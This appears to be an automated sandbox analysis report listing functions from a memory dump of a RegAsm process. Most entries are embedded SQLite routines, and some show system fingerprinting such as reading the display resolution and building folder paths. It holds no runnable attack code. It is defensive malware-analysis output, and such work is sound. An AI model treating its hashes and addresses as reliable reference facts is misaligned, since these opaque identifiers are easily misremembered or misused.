Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction ID: 9ee90ebccf69532c638dd304dce01fd66db5067a5336d3d8463288bf473cd575
Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction Fuzzy Hash: 8821B4EA9002423BE702DA209D01FAF33DC5F55706FAE8959FE15A10C1F728E70582E3

Function 1934FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1934FB96
API called with NULL prepared statement, xrefs: 1934FB65
API called with finalized prepared statement, xrefs: 1934FB7A
misuse, xrefs: 1934FBA0
%s at line %d of [%.10s], xrefs: 1934FBA5

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 5cf0771aa83a6eab4f1fdabb3c727e7a8b53b844088e38ca6c4c111db8b73b59
Instruction ID: 505cac9a61fc59de59613d2444b54b4dbff63c2b55d1c678ff3f45d2a5d48471
Opcode Fuzzy Hash: 5cf0771aa83a6eab4f1fdabb3c727e7a8b53b844088e38ca6c4c111db8b73b59
Instruction Fuzzy Hash: 4BB1E3B59007419FE7208F34DC49B1777E4BF45319F2E462CE88A87281E775E549CBA2

Function 192C1710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

rank, xrefs: 192C1824
%z, %Q HIDDEN, %s HIDDEN), xrefs: 192C1831
%z%s%Q, xrefs: 192C180D
CREATE TABLE x(, xrefs: 192C17D9

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
API String ID: 0-3324442540
Opcode ID: f4a8bd53c808cc8a301028496f382faa17de6e9e78308f67020c9eca51e574bb
Instruction ID: 03422631285a896aea08882149904130622c1b37e6c731e21712940397154520
Opcode Fuzzy Hash: f4a8bd53c808cc8a301028496f382faa17de6e9e78308f67020c9eca51e574bb
Instruction Fuzzy Hash: FE81F071A042569BEB058F64DC85E4BB7E8FF48359F280729FC49A7252D731E910CBE2

Function 193374A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 193374CD
API call with %s database connection pointer, xrefs: 193374C1
misuse, xrefs: 193374D7
unable to close due to unfinalized statements or unfinished backups, xrefs: 193375D1
%s at line %d of [%.10s], xrefs: 193374DC
invalid, xrefs: 193374BC

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 0-3800776574
Opcode ID: af45625263b9ae61353ba97a5f8ad08c715f6be315d33857c03efaf083f955a3
Instruction ID: c039d70ea99fd0cdb7ed76b9a01e92557e59e039832cf2e5f997caa5e91ffc68
Opcode Fuzzy Hash: af45625263b9ae61353ba97a5f8ad08c715f6be315d33857c03efaf083f955a3
Instruction Fuzzy Hash: A6513775980751ABF3268B34EC84B5B73A5AF40716F8D4218E85FA3781E730F741C6A2

Function 192DBCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

undersize RTree blobs in "%q_node", xrefs: 192DBDA1
SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 192DBD67
PRAGMA %Q.page_size, xrefs: 192DBD03

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
Opcode ID: f44849c1ee911a58b4d2f6f41846595252383f666bc98c6a12856c9180e5ad04
Instruction ID: 4490480f7b11698343457959f2630160daf6ba781ec44cf2cec703b63349944f
Opcode Fuzzy Hash: f44849c1ee911a58b4d2f6f41846595252383f666bc98c6a12856c9180e5ad04
Instruction Fuzzy Hash: 0931F2B1A00356AFE304DB74CD80A5A73E8EB0435AF484625FD0992301D735EA54CBA2

Function 004103A0 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
ReleaseDC.USER32(00000000,00000000), ref: 004103D6
GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?), ref: 004103E2
HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426678,00000000,?,00000000), ref: 004103E9
wsprintfA.USER32 ref: 004103FB

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Strings

%dx%d, xrefs: 004103F5

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: b8d7bca2d2f12ff90ba38a1e8a59390212395579c896a9438ed413e6516ca11a
Instruction ID: a5561a93a22769e98eddca292aca24bf0ee440d6a8de822d8c1c0f2786625d1a
Opcode Fuzzy Hash: b8d7bca2d2f12ff90ba38a1e8a59390212395579c896a9438ed413e6516ca11a
Instruction Fuzzy Hash: D5F0AD35A01224FBE7106BA1AC0DE9F7E6DFF4ABA1F001029FA0193150D6B5490187B4

Function 193332F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 193336B8, 193336FD, 1933375D, 1933380E
%s at line %d of [%.10s], xrefs: 193336C7, 1933370C, 1933376C, 1933381D
database corruption, xrefs: 193336C2, 19333707, 19333767, 19333818

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 63291e37db60da6a0c6e888bc23f29615eae6cb9842c2a68bdd69eef23b94c49
Instruction ID: 9e969e8a7ce58d00b76ba78d25614265bee00c5041e11f98a627a4293ea14787
Opcode Fuzzy Hash: 63291e37db60da6a0c6e888bc23f29615eae6cb9842c2a68bdd69eef23b94c49
Instruction Fuzzy Hash: 6DF147756446919FD700CF28C8806A7BBE0FF45316FC88299E848C7792E335EA55C7A2

Function 192628E5 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 346COMMON

Download Yara Rule

Strings

malformed inverted index for FTS5 table %s.%s, xrefs: 19262A8A
unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 19262AA0
INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 192629F1

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
API String ID: 0-3572959941
Opcode ID: 14e7830f657b5bbd34be5bd4b931fd66e165899969762d92ba74fc15ce31e22b
Instruction ID: 439dc5279447ff42f1154fd2ef3a8bae62231e08062ddf75996ed028ff7e8211
Opcode Fuzzy Hash: 14e7830f657b5bbd34be5bd4b931fd66e165899969762d92ba74fc15ce31e22b
Instruction Fuzzy Hash: C74139719012A59FE314CF34DC88EAB77A8EF45259F180229FD49C2651D731D684CBF2

Function 19249700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

(FK), xrefs: 192498D3

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: (FK)
API String ID: 0-1642768157
Opcode ID: 5d0dcc2f8d5c00deb849be2e924a53c20f6b0d19dd66e1fdf5124e12130ed799
Instruction ID: 539b0b360fe72ac57b63d43cffa3645f0560c7baf58ce7103a1a0572c9199334
Opcode Fuzzy Hash: 5d0dcc2f8d5c00deb849be2e924a53c20f6b0d19dd66e1fdf5124e12130ed799
Instruction Fuzzy Hash: 3F81C4BA7052019FEB049F28EC40B56F3A1FB84636F384A6EE546876E1E732E511D750

Function 193C8D80 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 271COMMON

Download Yara Rule

Strings

readonly_shm, xrefs: 193C8F52
%s-shm, xrefs: 193C8DF2
winOpenShm, xrefs: 193C8FB9

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s-shm$readonly_shm$winOpenShm
API String ID: 0-2815843928
Opcode ID: 0cb8b773dd61c6af3e1fe3933ff9a4ed3d9a42b62bb8663e3ffab1d14050225d
Instruction ID: 939bd738d622078640759f2383795a54c6b7d571e456977828da3427ee4022c5
Opcode Fuzzy Hash: 0cb8b773dd61c6af3e1fe3933ff9a4ed3d9a42b62bb8663e3ffab1d14050225d
Instruction Fuzzy Hash: 1A91BEB1900B999BE7149F34DC84B1677A8FB00319F09472AED4997381EB35EA14CBA3

Function 1925EB00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1925ECCB
%s at line %d of [%.10s], xrefs: 1925ECDA
database corruption, xrefs: 1925ECD5
%.*s%s, xrefs: 1925EC88

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-894757972
Opcode ID: 34102d175a41ee49c7e87d98ee98b3cf4a68a5b7d5d4154a07ed28a6a24ba3f3
Instruction ID: 9333717e7a48dcb157ecd5263b4d0da3e01af15ac255c977f79071ceaf08ebea
Opcode Fuzzy Hash: 34102d175a41ee49c7e87d98ee98b3cf4a68a5b7d5d4154a07ed28a6a24ba3f3
Instruction Fuzzy Hash: 166124B5604342ABE714CF14C980AABB7E1BF88311F1C896DE85A9B380D731FD05CB81

Function 19239DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g]], xrefs: 19239EC0
[%!g,%!g],, xrefs: 19239E7E

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 7eff3fb142f145f342b3c4fc6b69699a75b6a29da8f6af3f42dd6afd53efd2a5
Instruction ID: c319d67a65aedfc9d341578abec3c5707d184ec8daf5ee57cede9a0031597828
Opcode Fuzzy Hash: 7eff3fb142f145f342b3c4fc6b69699a75b6a29da8f6af3f42dd6afd53efd2a5
Instruction Fuzzy Hash: 845136B4A00B45CBD710DF28C8C0B57B7B4BF4A306F588629F84A96241E771E645CBA2

Function 1925F330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1925F418
malformed inverted index for FTS%d table %s.%s, xrefs: 1925F3F3
INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1925F33F

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
API String ID: 0-2809892521
Opcode ID: 4e9af31eb568061b44dfcbb4e7ee48d8f47564e4f867738ae2c3d89f0b683e0b
Instruction ID: 015d2b219b5ad15b136454fff5f4069a88895147100f1f8de1c64b38f845d029
Opcode Fuzzy Hash: 4e9af31eb568061b44dfcbb4e7ee48d8f47564e4f867738ae2c3d89f0b683e0b
Instruction Fuzzy Hash: 3341D0B19012E6ABF704DB35DC88FDB3768EF40259F184629FE0AC2241D721D659CBB2

Function 192530F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2699a62e5ebd3279e435e622ea588e9809b836afe04d6f8c6396ba9913cbd53
Instruction ID: 39524887efa01a437168418fc5e3aacf62f9af2fd1974d545fe3cedd609d5551
Opcode Fuzzy Hash: b2699a62e5ebd3279e435e622ea588e9809b836afe04d6f8c6396ba9913cbd53
Instruction Fuzzy Hash: 18517175608201AFDB40EB68FC04EDB7BE2EF85321F1985A8F158872B2E231DD51DB41

Function 0041612D Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416132
lstrcat.KERNEL32(?,?), ref: 00416188

Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52

lstrcat.KERNEL32(?,00000000), ref: 004161AE
lstrcat.KERNEL32(?,?), ref: 004161CE
lstrcat.KERNEL32(?,?), ref: 004161E2
lstrcat.KERNEL32(?), ref: 004161F5
lstrcat.KERNEL32(?,?), ref: 00416209
lstrcat.KERNEL32(?), ref: 0041621C

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
